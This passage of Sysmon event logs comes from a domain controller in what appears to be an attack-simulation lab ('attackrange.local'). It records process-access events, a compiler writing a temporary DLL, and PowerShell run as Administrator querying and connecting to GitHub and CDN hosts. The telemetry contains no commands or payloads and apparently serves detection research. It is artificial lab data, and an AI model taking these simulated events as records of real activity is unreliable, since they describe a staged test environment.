07:58:59.283","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4697,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.298\r\nSourceProcessGUID: {41C8662E-20BF-5F25-0000-001074C30600}\r\nSourceProcessId: 5076\r\nSourceThreadId: 4416\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20C3-5F25-0000-00105C170700}\r\nTargetProcessId: 3908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.298","SourceProcessGUID":"{41C8662E-20BF-5F25-0000-001074C30600}","SourceProcessId":"5076","SourceThreadId":"4416","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20C3-5F25-0000-00105C170700}","TargetProcessId":"3908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4698,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:58:59.298\r\nProcessGuid: {41C8662E-20C3-5F25-0000-0010CE130700}\r\nProcessId: 2860\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\xuadk0jp\\xuadk0jp.dll\r\nCreationUtcTime: 2020-08-01 07:58:59.220","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:58:59.298","ProcessGuid":"{41C8662E-20C3-5F25-0000-0010CE130700}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\xuadk0jp\\xuadk0jp.dll","CreationUtcTime":"2020-08-01 07:58:59.220","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":4699,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:58.228\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nQueryName: github.com\r\nQueryStatus: 0\r\nQueryResults: ::ffff:140.82.113.4;\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:58:58.228","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","QueryName":"github.com","QueryStatus":"0","QueryResults":"::ffff:140.82.113.4;","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventReceivedTime":"2020-08-01 07:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4700,"ProcessID":2804,"ThreadID":3336,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:58.240\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-6178966.attackrange.local\r\nSourcePort: 50155\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 140.82.113.4\r\nDestinationHostname: lb-140-82-113-4-iad.github.com\r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 07:58:58.240","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-6178966.attackrange.local","SourcePort":"50155","DestinationIsIpv6":"false","DestinationIp":"140.82.113.4","DestinationHostname":"lb-140-82-113-4-iad.github.com","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 07:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4701,"ProcessID":2804,"ThreadID":3336,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:58.396\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-6178966.attackrange.local\r\nSourcePort: 50156\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 140.82.113.9\r\nDestinationHostname: lb-140-82-113-9-iad.github.com\r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 07:58:58.396","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-6178966.attackrange.local","SourcePort":"50156","DestinationIsIpv6":"false","DestinationIp":"140.82.113.9","DestinationHostname":"lb-140-82-113-9-iad.github.com","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 07:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:00","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":4702,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:58.384\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nQueryName: codeload.github.com\r\nQueryStatus: 0\r\nQueryResults: ::ffff:140.82.113.9;\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:58:58.384","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","QueryName":"codeload.github.com","QueryStatus":"0","QueryResults":"::ffff:140.82.113.9;","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventReceivedTime":"2020-08-01 07:59:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:00","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4703,"ProcessID":2804,"ThreadID":3336,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.644\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-6178966.attackrange.local\r\nSourcePort: 50157\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 23.47.31.208\r\nDestinationHostname: a23-47-31-208.deploy.static.akamaitechnologies.com\r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.644","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-6178966.attackrange.local","SourcePort":"50157","DestinationIsIpv6":"false","DestinationIp":"23.47.31.208","DestinationHostname":"a23-47-31-208.deploy.static.akamaitechnologies.com","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 07:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:01","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4704,"ProcessID":2804,"ThreadID":3336,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.694\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-6178966.attackrange.local\r\nSourcePort: 50158\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 72.21.81.200\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.694","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-6178966.attackrange.local","SourcePort":"50158","DestinationIsIpv6":"false","DestinationIp":"72.21.81.200","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 07:59:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:02","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":4705,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.685\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nQueryName: onegetcdn.azureedge.net\r\nQueryStatus: 0\r\nQueryResults: type:  5 onegetcdn.ec.azureedge.net;type:  5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.685","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","QueryName":"onegetcdn.azureedge.net","QueryStatus":"0","QueryResults":"type:  5 onegetcdn.ec.azureedge.net;type:  5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventReceivedTime":"2020-08-01 07:59:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4706,"ProcessID":2804,"ThreadID":3336,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:01.496\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-6178966.attackrange.local\r\nSourcePort: 50160\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 23.47.31.208\r\nDestinationHostname: a23-47-31-208.deploy.static.akamaitechnologies.com\r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 07:59:01.496","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-6178966.attackrange.local","SourcePort":"50160","DestinationIsIpv6":"false","DestinationIp":"23.47.31.208","DestinationHostname":"a23-47-31-208.deploy.static.akamaitechnologies.com","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 07:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4707,"ProcessID":2804,"ThreadID":3336,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:01.658\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-6178966.attackrange.local\r\nSourcePort: 50161\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 168.61.186.235\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 07:59:01.658","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-6178966.attackrange.local","SourcePort":"50161","DestinationIsIpv6":"false","DestinationIp":"168.61.186.235","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 07:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4708,"ProcessID":2804,"ThreadID":3336,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:01.810\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-6178966.attackrange.local\r\nSourcePort: 50162\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 23.47.31.208\r\nDestinationHostname: a23-47-31-208.deploy.static.akamaitechnologies.com\r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 07:59:01.810","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-6178966.attackrange.local","SourcePort":"50162","DestinationIsIpv6":"false","DestinationIp":"23.47.31.208","DestinationHostname":"a23-47-31-208.deploy.static.akamaitechnologies.com","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 07:59:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4709,"ProcessID":2804,"ThreadID":3336,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:01.896\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-6178966.attackrange.local\r\nSourcePort: 50163\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 168.61.186.235\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 07:59:01.896","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-6178966.attackrange.local","SourcePort":"50163","DestinationIsIpv6":"false","DestinationIp":"168.61.186.235","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 07:59:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4710,"ProcessID":2804,"ThreadID":3336,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:02.027\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-6178966.attackrange.local\r\nSourcePort: 50164\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 23.47.31.208\r\nDestinationHostname: a23-47-31-208.deploy.static.akamaitechnologies.com\r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 07:59:02.027","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-6178966.attackrange.local","SourcePort":"50164","DestinationIsIpv6":"false","DestinationIp":"23.47.31.208","DestinationHostname":"a23-47-31-208.deploy.static.akamaitechnologies.com","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 07:59:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":4711,"ProcessID":2804,"ThreadID":3336,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:02.109\r\nProcessGuid: {41C8662E-20C0-5F25-0000-001025EA0600}\r\nProcessId: 4240\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-6178966.attackrange.local\r\nSourcePort: 50165\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 168.61.186.235\r\nDestinationHostname: \r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 07:59:02.109","ProcessGuid":"{41C8662E-20C0-5F25-0000-001025EA0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-6178966.attackrange.local","SourcePort":"50165","DestinationIsIpv6":"false","DestinationIp":"168.61.186.235","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 07:59:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
